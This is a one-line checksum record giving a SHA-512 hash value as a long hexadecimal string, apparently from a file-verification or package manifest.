SHA512918e878d9ce92161a9447bfb67a37ae2c100a642ef9bfb0f3c15baffa7382d29139c402e5ed8e2429956c023c0c724e53b343a2028308bc2644fba787cc16020